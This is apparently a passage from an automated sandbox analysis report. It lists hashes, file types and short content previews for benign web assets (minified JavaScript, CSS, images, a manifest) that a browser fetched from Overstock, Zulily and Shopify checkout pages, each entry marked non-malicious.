                                                                                                                                                                                    Preview:import{al as $e,dS as ue,q as k,fo as b,fp as we,fq as xe,fr as Ie,fs as ce,ft as de,T as q,fu as j,cc as G,r as ke,h as I,l as qe,v as Te,fv as Fe,cp as Ce,fc as Pe,m as ze,fw as Le,fh as De,u as Me,fx as Oe,cM as oe,p as M,fy as Re,y as O}from"./app.DfgMZONA.js";function Ue(e){const t=$e(),{geolocation:s}=ue();return k(async(n,u,d)=>{const o=await e(n,u,d);return t.histogram({name:"prediction_duration",value:o.duration.end-o.duration.start,attributes:{buyerCountry:s.country.code}}),o.data},[e,t,s.country.code])}function Ne(e){if(typeof e!="object")throw new b(`formattedAddress must be an object: received type ${typeof e}`);const t=ae(e);if(t.length)throw new b(t.join("; "));return e}function _e(e){const t=[];if(!Array.isArray(e))throw new b("An array of address suggestions must be defined");const s=e.slice(0,5);for(const[n,{id:u,label:d,matchedSubstrings:o,formattedAddress:i}]of s.entries()){if(S(d)||t.push(`label is required and must be a non-empty string: received ${typeof d} in su
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (20235)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):24394
                                                                                                                                                                                    Entropy (8bit):5.512377842344329
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:vs/9vNwg8FS7dGJBTCsGg2mB/5FUs6pKLbUxdXtLXaJPPv2GggWGY:uN9DmZlYdS2GggWGY
                                                                                                                                                                                    MD5:17F0A135EB15799FCFFAD2B076BA5A83
                                                                                                                                                                                    SHA1:FA09FE59E00C70EB47B518445F49EA7BE052F49E
                                                                                                                                                                                    SHA-256:2C2376365F9C79B9338182A4973F121D6C13168A497818EE8C0B05948E22BBCF
                                                                                                                                                                                    SHA-512:13FE748AD572F6A0AA42277FE32F15C2D28EAF9D7DBF64ACAC48EA9896C274039D0F52E4A9102035CF09D5BCAE64C364F12D1F65DC171B4DAC30827A306D053B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/vsearch-main.2d4HcZXx.js?v=118034627793632815521730157903
                                                                                                                                                                                    Preview:const __vite__fileDeps=window.__vite__fileDeps||[],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.(function(){"use strict";try{if(typeof document<"u"){var e=document.createElement("style");e.appendChild(document.createTextNode(`._overlay_1il33_1{position:fixed;top:0;left:0;width:100%;height:100%;z-index:35;display:block;opacity:1;background-color:#fff}._withSideAnimation_1il33_13{transition:left .3s ease}._open_1il33_17{left:0}._close_1il33_21{left:100%}._facetValueLabel_1n921_1{position:relative;display:block;padding-left:28px;color:#252525;font-size:14px;cursor:pointer}._facetValueLabel_1n921_1 input{position:absolute;opacity:0;height:0;width:0}._facetValueLabel_1n921_1:before{content:"";position:absolute;top:50%;left:0;transform:translateY(-50%);width:20px;height:20px;box-sizing:border-box;border-radius:2px;border:1px solid #5a5a5a}._facetValueLabel_1n921_1._isRadio_1n921_27:before{border-radius:50%}._checked_1n921_31:before{border:none;content:url("data:image/svg+xml,%3csvg%20xm
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1484
                                                                                                                                                                                    Entropy (8bit):6.6909479880847575
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:05TCIl/X2YlXWI2PU1kFJzq98UGECSClszU7WlTUXcjP0IklXj2ITp:nIl/XfljSJzE8vSCleUDMj8IAXl
                                                                                                                                                                                    MD5:1F7A732AA3E621E5E74736D639413F29
                                                                                                                                                                                    SHA1:0D3050AE7F5FFF9CE01C6E1ADA4853DB263D3B22
                                                                                                                                                                                    SHA-256:B8BB1EF1B0FDD8CB882E7D27F211D6FE3177ACF7262A52FF0539C11B977F1D24
                                                                                                                                                                                    SHA-512:A34C43653726B3709EBFAFCC12F96BB60EF3D5DDBE4D6904A3E85113FF438783613B0000CAF710A820186E92F9EEBC47EF4821E2B417FBAEBAD826F76AD80BD5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_85394fa8-eb5f-45de-a628-4a2a8dffd1b6.jpg?v=1729325087&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 4........*P.P.>1..B.!!...P ....A.4...}...@................;.....F2..........f..\.?.<..{h.;.....g..(......{.q...7..-c..~;.9...h.C.LSpms.y.p.&@....x..}....Y.'.G~...P.....6..x..z...o...............U...Iio.....Ik...0..FOm.S....{P.L./.."i.b..w..s~O.M2.i...tg.......j."-P.a.&.m<...L....A.o........r....zO.....V^M..A.....&7....U.i......-../......u..'./=a...D..C..o.<rq..N....x........b...A..}~..m...OIH.._'.T=.0.@.S....;1.J.._2nI/A|j...w.#....n .k.paW.Cqg.~m...o2........3..e.c9.+....+....m..tq#..S....).r[.Go..K.".8.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1898
                                                                                                                                                                                    Entropy (8bit):7.027693014765721
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:iTCIl/X2YlXWI2PUPYeBtajX207Bln45dl5NsNJHuYl0J8Vk1IGSVd5a4PQPSItd:PIl/XflHBUXDW98BmdyC4NID
                                                                                                                                                                                    MD5:6712FD1AEF11E0C66E97425486C8946A
                                                                                                                                                                                    SHA1:55F20D5673E3FD7D35541EE7A1738132E57B19BC
                                                                                                                                                                                    SHA-256:904298977CCE78A77730AD37E9A30C0F0691039A0FCD041828764184494F5586
                                                                                                                                                                                    SHA-512:9656D137074C7C142BCA83671520E4E74DCEF70D98D65279AA39191AA262B3A75403CBC392F39D1423408A1C73C152336A1E33A1C87F2EA80AC61A3751181274
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_ee2065f7-52b0-4101-9b0c-e22cd2317b96.jpg?v=1729322973&width=80
                                                                                                                                                                                    Preview:RIFFb...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>-..B...e....bY.1..K.....n..z.7.._.V.X.h.3...'...\......:u.#..kM_X.....@..C.v....9.P......<8..;t..U.....bm.a..g..J}%......GQ.&...6..CFo....=.=..xe....E.....nY.z......|..k|.y.IH.^.....&...=*......Xe.@+....UlA.h.q....r..?._....A...O.W....[....f..d..&...%gN...Wk.....Z....H...j.N;.R.8......n....l..6....2?[!.FK)L@..r..e..6........,..5=Fo.....;.nKO..;..V=..._.!p..k....>2|Nk4.F.*...GD.....L..EI.!...]+?......H4........r=B4.'..w%..XT...).k...hV%..#.... ...`..g.^...{.....N....T.........Z....k..b..m
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):141
                                                                                                                                                                                    Entropy (8bit):4.674166365605415
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:mifF9EOZrw/9EOzFHLR6c4d99VK9oBPLAB11AXB/FMaXVRDq:vP14zFARwKx/FMcVRq
                                                                                                                                                                                    MD5:1BFB512B7D6D2761BA3191844A8DCC58
                                                                                                                                                                                    SHA1:4BB03A2498C2B88B0F5070F6FAD6A6EE6D639222
                                                                                                                                                                                    SHA-256:919B9C053C74F609E6051586A69E19937974B234E1BFC64ABE4FC579E6B50756
                                                                                                                                                                                    SHA-512:0689A62B9688FD7B69045A4D7B8852D843E7243F1736FDE311D49C2D29E7B526CE4A4D6DA36763E3945BAF8E73AA1595A5A65E753CFB8C99BCB8539CC27C4C7D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.bedbathandbeyond.com/manifest.json
                                                                                                                                                                                    Preview:{. "name": "Overstock.com",. "short_name": "Overstock",. "start_url": "/",. "display": "standalone",. "gcm_sender_id": "986320318873".}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1130
                                                                                                                                                                                    Entropy (8bit):6.072506028611903
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:DLCIl/X2YlXWI2PUgV6uZuVE7B6Fu5CTJ6Qp6HOA:DeIl/XflY6iuVUB6Fu06Qp6Ht
                                                                                                                                                                                    MD5:307A2323655689E72378A2B6596544CA
                                                                                                                                                                                    SHA1:80031D2C17B147E789BFAA7A1EB1B8682A402F0E
                                                                                                                                                                                    SHA-256:F20B3E7E2BE5E0149A86CA7FA618631B131C7459C32E1210DF69AACAECB45DB9
                                                                                                                                                                                    SHA-512:DC08A05D8AA832A7A8FDD57848D00308CC0840D220AC801A7E340D36CD26AA9F5C7BFEDE5899E16A60C54BFA3223816ACEEAD8F41EFAEBE0441D2873F43129C2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_e25e0449-1203-486e-a473-112cb2ea564f.jpg?v=1729322908&width=56
                                                                                                                                                                                    Preview:RIFFb...WEBPVP8X....(...7..7..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*8.8.>1..B.!!.... ....!C...S/...kG"..'g.x..9..3UrI@..|....,..'V.+.....P.....&7._.?._.....s..~...,u....d......{2.4.zI..)JOh.y.yC............c.1.Zh.,~.g\...o.,..$.;..]$.".o`[...}H.|7~e7.. .:Zoz.....4..0....&.\.e..(=.8`?.j.D..(....]..iA..#....~.Dk.>be.M$....................<..v.^..K.S5.1.l....O2...0.v.....)q2.......VT^9<.W,hV}.puP*q.4@:.7.:..Hp]....o......e].....\... ..|.a..s..Ja9...$.F..<~|:...~r.,..n...5.....Y....:..B.T..o..".@6.l.....o\X...EXIF....Exif..II*...........................V...........^...(...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (45454), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):45456
                                                                                                                                                                                    Entropy (8bit):5.5994167193474045
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:LEUinFZQxQirQIP0n8j1y9zez93aTZOOq8M8x7d1qmZwmrjmorQxjf:LEUOvQaLIPPf55Oq8M8x5tZwmrHUxjf
                                                                                                                                                                                    MD5:1BEDBAB9628E1F071B8467E42EC79D87
                                                                                                                                                                                    SHA1:9551CA7393EB6E608E3EED17CC1FE3221DB4C425
                                                                                                                                                                                    SHA-256:2D3594444B79DEE6B71D5E78287C24A4AD9623395521341B1DFC7420C6019A75
                                                                                                                                                                                    SHA-512:B474C34CD310E13ECC1289BDE3419141E89CAE7D4601BE17FBAEEA3D5A54FC6C7F04C51C41B7280F44EB7A7D3605CE9620E75EABC3E3003B7C4CBC3E0CF7FA95
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[152],{2543:function(e,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=function(){return function(e){if(window)try{window.dataLayer=window.dataLayer||[],window.dataLayer.push(e)}catch(e){console.error("Error pushing to dataLayer: ".concat(e))}}}},6152:function(e,t,n){var o=n(5318);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var i=o(n(7757)),l=o(n(9713)),r=o(n(8926)),a=o(n(3038)),s=n(8661),d=o(n(5697)),c=n(8422),u=o(n(3971)),f=o(n(2543)),p=o(n(6380)),h=o(n(4952)),g=o(n(8506)),x=o(n(1615)),m=o(n(424)),y=o(n(6532)),b=n(2416),_=o(n(2325)),v=n(6584);function C(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,o)}return n}function w(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1231), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1231
                                                                                                                                                                                    Entropy (8bit):5.2171804506361505
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:fbj78joOLQmepOlgEx3N6JxAU7bXmI2Vy2C5IRlXop:fbPVmQwlgEx3N6JxAK2nA2IX
                                                                                                                                                                                    MD5:A4FD32B8A56760276F77B56B8FF8D9B4
                                                                                                                                                                                    SHA1:B5E47AE3DF51CF81004931A1576CDFEBB41B71AC
                                                                                                                                                                                    SHA-256:362BADC4612E62C3C83A97F2ECA11B3144ED322906C87E3396A1B10A5CAC464B
                                                                                                                                                                                    SHA-512:6885D27D20F4FBAEE5BD1ECCA89D93107F9DE7271E8A30ED1EBC25CF6D5658A72C88990CAE4B5AE1B844805E9AD044932F31C796D8A173E6B03E6A02D0AB1CCD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[888],{2551:function(e,t,r){"use strict";r.r(t);var n=r(9499),o=(r(2747),r(5893));function c(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}t.default=function(e){var t=e.Component,r=e.pageProps;return(0,o.jsx)(t,function(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?c(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):c(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}({},r))}},1118:function(e,t,r){(window.__NEXT_P=window.__NEXT_P||[]).push(["/_app",function(){return r(2551)}])},2747:function(){},9499:function(e,t,r){"use strict";function n(e,t,r){return t in e?Object.defineP
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3841)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3842
                                                                                                                                                                                    Entropy (8bit):5.2385929831301485
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:h2ehHZOH3OXyR38RADQ+LfLDx2c8I9W82VppZTF5yd9k9zl:h2ehHZ6eCBTjLN2A9j2XTF5yql
                                                                                                                                                                                    MD5:6C6739F22C427F0C725E65C352950B68
                                                                                                                                                                                    SHA1:53F3120200C7407706A5CA1ABB1F9B44C3740655
                                                                                                                                                                                    SHA-256:E20901E5A6D830C8F7FB4A9902AF19D8232AE1C3624E9BE8ADF06ADDED3B24BD
                                                                                                                                                                                    SHA-512:0AE48CE244FEC50163E1D1DF0F47A68EBCD2263DB7EE98E455915B4DB0DE647CC2784BA1C6B450843771937D2B355F191F9512C6FFBA6BED4CBDC39A893C263C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/Section.Dvvun2gq.js
                                                                                                                                                                                    Preview:import{A as T,y as _,e as E,cq as B,oT as A,mp as L,E as c,h as R,eD as x,bO as C,q as H,oU as V,a as e,az as P,aG as k,oV as w,a7 as u,V as h,bS as U,aQ as I,aa as q,a9 as Q,bT as F,oW as N,cs as f,ay as G,ab as d,kE as J,aI as $,kF as j,D as K}from"./app.DfgMZONA.js";const X=6e4;function ie({enabled:n,onTimeout:i,timeout:r=X}){const s=T(null),a=T(i);a.current=i,_(()=>{if(n)return s.current=setTimeout(()=>a.current(r),r),()=>{s.current&&clearTimeout(s.current)}},[n,r])}const Y="WPQk2",Z="qReyn",D={IconText:Y,Button:Z};function re(){const n=E(),{currentDetour:i}=B(),r=i?.type==="shopPayLogin",s=A("bottom"),a=L(s),o=c.default("block").when({viewportInlineSize:{min:"medium"}},"none"),l=r||a,[t,m]=R(l),S=x(),b=C({base:!0,medium:!1}),v=n("order_summary.title","Order summary"),z=H(()=>m(M=>!M),[]),{merchandiseLinesWithCount:O}=V();if(!b&&S)return null;if(O<=1)return e(h,{display:o,children:[e(P,{spacing:"large200",children:[e(k,{level:1,children:v}),e(w,{skipWrappingSection:!0,hideAccessibi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):393
                                                                                                                                                                                    Entropy (8bit):5.13232724082112
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:tnrZ3umc4slZ8CirSl496RSM4jHiqHpumqZllUR4t6FfT0qtv4FuCLrdGos+t5Ap:trZ3uBCrjHiqHchllUqtu9tvuVQ+n8b
                                                                                                                                                                                    MD5:0A17A7ED311E249EDE29E60C295D176A
                                                                                                                                                                                    SHA1:8CEE02F0D4A148B836F01EC5382897BCD83FAC12
                                                                                                                                                                                    SHA-256:3577D8A0692996608D15BD647FD41A2F3798C17A40024B2E123951EE78BD8A37
                                                                                                                                                                                    SHA-512:A9B53B3E571B3FBBC610C4B1379DE15C61F76C54D5D8DB5EB95C13FC1CCE33AF63C9290272A8B67D2A8F8FD01EBF71231DA162D278AA85C304D3C6AC317A1685
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/cdn/shop/t/70/assets/clock.svg?v=182162951363561203611728391531
                                                                                                                                                                                    Preview:<svg width="16" height="17" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)" stroke="#2F3337" stroke-width="1.25" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"><path d="M8.5 16a7 7 0 1 0 0-14 7 7 0 0 0 0 14Z"/><path d="M8.5 5v4h4"/></g><defs><clipPath id="a"><path fill="#fff" transform="translate(0 .5)" d="M0 0h16v16H0z"/></clipPath></defs></svg>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1073)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1173
                                                                                                                                                                                    Entropy (8bit):5.010637034911675
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:sMBTFT2ET26cFEFP4Q6pmuuNLAINQ6zpUTP7TuVQ6mYQS6Q6XvxNApBC8:sMBTFTjTNyKFTGBTPX5ymxNApI8
                                                                                                                                                                                    MD5:E2CA539FEB1DB914314C110B9E419569
                                                                                                                                                                                    SHA1:95C5130254A35912099F1CD555EA852CCCEC0D93
                                                                                                                                                                                    SHA-256:68C92EB01438027C34E96EFDE4935000A60CDCC36B31D00C9F87DA3FF4654F46
                                                                                                                                                                                    SHA-512:A64F4840FB0325C17FA3EF6D896BE1150337F03C898A183E2C25337A5B855A018B2BEA796659B03B26D0F490C23B0606C640ACE5B17A8179E578CE8EF335F25B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/promo-strip.css?v=97151819380307353391730157903
                                                                                                                                                                                    Preview:.newsletter-form-success{display:none}#newsletter-form-input-wrap{display:flex;background:#fff;padding:5px}.newsletter-form-input-wrap input,.newsletter-form-input-wrap input:focus,.newsletter-form-input-wrap input:hover,.newsletter-form-input-wrap button{border:unset}.newsletter-form-success{padding:5px}h5.newsletter-form-success-title.form-status-title{color:#fff;margin:auto}.promo-strip__discount .input-with-button{display:inline-flex}.promo-strip__discount,.promo-strip__button,.promo-strip__rte{margin-bottom:.8em}.promo-strip__heading{max-width:100%;margin-bottom:.2em}@media (max-width: 768.98px){.promo-strip__heading+.promo-strip__button{margin-top:.8em}.newsletter-form-input-wrap input{flex:1}}@media (min-width: 769px){.promo-strip__container{display:flex;row-gap:calc(4 * var(--space-unit))}.promo-strip__container .section__block{margin-bottom:0}.promo-strip__button{white-space:nowrap}}@media (min-width: 1024px){.promo-strip__container .rte{flex-shrink:0;max-width:100%}.promo-str
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2240)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2344
                                                                                                                                                                                    Entropy (8bit):4.8992937161367465
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:RfZzHEslT4z8UbBbXbvb6bSkbv6bx9lKrsh3mN9sfdFFs18A4qzq8n363Uzq8pwa:RhqJ9DTmekL6nliS2vh4kqIqmqywEv
                                                                                                                                                                                    MD5:2F90103D77DD2699BB7AA6446C82AB5F
                                                                                                                                                                                    SHA1:9491F3940C43EA1B337ED475BB56CD3FA63AFA83
                                                                                                                                                                                    SHA-256:57C160DCBA4926B20C80326642C769669DBF34F4AEFD88CF947EA345DD720505
                                                                                                                                                                                    SHA-512:BCDBC5F20F9231EAE4EAE7D0352733198431E3919C1C28D9EF8F961BDF18CC1D080F2EC762A6FDF9E3C2E8D01965A5D1CF9EC2E9B491696D63957A773C07FBED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/toast-notification.js?v=111204382723537722131730157903
                                                                                                                                                                                    Preview:if(!customElements.get("toast-notification")){class ToastNotification extends HTMLElement{constructor(){super(),this.init()}getCookie(name){const parts=`; ${document.cookie}`.split(`; ${name}=`);return parts.length===2?parts.pop().split(";").shift():null}setCookie(name,value){document.cookie=`${name}=${value};path=/`}getDiscountFromCookies(){const discountCode=this.getCookie("discount_code");let dismissedToasts=this.getCookie("dismissed_toasts");return dismissedToasts=dismissedToasts?JSON.parse(dismissedToasts):[],!discountCode||dismissedToasts.includes(discountCode)?!1:(dismissedToasts.push(discountCode),this.setCookie("dismissed_toasts",JSON.stringify(dismissedToasts)),discountCode)}checkDiscount(cart,code){return this.checkCartDiscount(cart,code)?this.checkCartDiscount(cart,code):this.checkProductDiscount(cart,code)?this.checkProductDiscount(cart,code):!1}checkCartDiscount(cart,code){return cart.cart_level_discount_applications.some(discount=>discount.title===code)}checkProductDisco
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2016)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2017
                                                                                                                                                                                    Entropy (8bit):5.240604507370637
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:E+V0g5jpNJtWqJ42AF6sqIhjr+T/FoWOzJzp:fN94qJ5hgjb
                                                                                                                                                                                    MD5:529AA4962F87174831E7874E0C27A0BF
                                                                                                                                                                                    SHA1:99E8F847531B0022F657F7CEBB08B50197867626
                                                                                                                                                                                    SHA-256:59F8A9ABC5676652AC08B9034624B56F7EA57CAC054BEEA05588328FDA8BA17D
                                                                                                                                                                                    SHA-512:FBA1C638829224AB4AEBCF16179C145A04A8A3FB5D49DBC5FEB0AC75F613EF709D18A1AC3513BF313310503268BF6046207BF83DD5983FF04013DF17E431C669
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/ShopPayVerificationSwitch.DVQdwG9J.css
                                                                                                                                                                                    Preview:.qdHCv{position:absolute;z-index:1000;top:0;left:0}.hgqpU{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1;background-color:rgba(0,0,0,.18);opacity:0;visibility:hidden;transition:opacity calc(var(--x-duration-base) * 5) cubic-bezier(.2,.9,.3,1)}.LTbS5{opacity:1;visibility:visible}.axmya{background-image:linear-gradient(180deg,rgba(0,0,0,0),rgba(0,0,0,.8) 55%)}.JHj7j{--popover-arrow-size: 2.5rem;position:relative;visibility:hidden;opacity:0;height:0;width:0;overflow:hidden;transform:scale(.1) matrix3d(1,0,0,0,0,.8,.5,-.002,0,-.4,.8,0,0,0,0,1);transition-timing-function:cubic-bezier(.2,.9,.3,1);transition-duration:var(--x-duration-base);transition-property:transform,opacity,height;transition-delay:var(--x-duration-base),var(--x-duration-base),0s}.JHj7j:after{box-shadow:0 19px 47px rgba(0,0,0,.35);content:"";z-index:-1;position:absolute;left:5%;right:5%;top:0;height:100%;width:90%;display:block}.JHj7j .hQvGd{min-width:calc(var(--popover-arrow-size) * 2)}.PMbsk:before{background-colo
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (6320)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6321
                                                                                                                                                                                    Entropy (8bit):5.326460697147914
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:3wdGJ4Oa/que/YhWU4DacT3aVarNlCaaMXiaQ3Kav2PXE:3wdGJ4O2DhWU4DacT3aVaRlCaaMXiaQv
                                                                                                                                                                                    MD5:7D911574AFA6309CCF1F8761E00D24FA
                                                                                                                                                                                    SHA1:1B14998829BA95B20E380B0164451FD631A73977
                                                                                                                                                                                    SHA-256:A2C376481BA67559433EBDB9F6E3773DB7AF20E7EFFA2D5B39BAE4A29868BF96
                                                                                                                                                                                    SHA-512:FD5ECAFC2CD4C391458B5350B05D3846AC4B19BC51864B1E1C08117F913F3215506D8C46F1D4BF78C8638FCAD7EAA2452080CA9AC901F96C47FCF6A67980F1E4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/PickupPointCarrierLogo.Dit2gzD9.js
                                                                                                                                                                                    Preview:import{bJ as P,a as t,k as A,e as B,A as l,bK as E,q as U,y as M,ae as O,bL as z,ab as G,V as J,a8 as N,I as V}from"./app.DfgMZONA.js";const W=P(function(s,r){return t("iframe",{...s,ref:r})}),X={Map:"veGnT"},q="https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/current-location-pin.BapvrdeV.svg",K="https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/destination-location-pin.DwoZMqg_.svg",p="shopify_sandboxed_message:";function H(e){if(!(typeof e!="string"||!e.startsWith(p)))try{return JSON.parse(e.replace(p,""))}catch{}}function Q(e){return`${p}${JSON.stringify(e)}`}function x(e){return e?.map(s=>{switch(s.type){case"current":return{...s,image:q};case"destination":return{...s,image:K};default:return s}})}const j=200;function ke({className:e,markers:s,options:r,title:_,mapId:F,blockSize:u=j,onMarkerSelect:f,handleBoundsChanged:m,handleCenterChanged:h,handleClick:d,handleDoubleClick:g,handleDrag:b,handleZoomChanged:T,handleDragEnd:R}){const I=A(),C=B
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
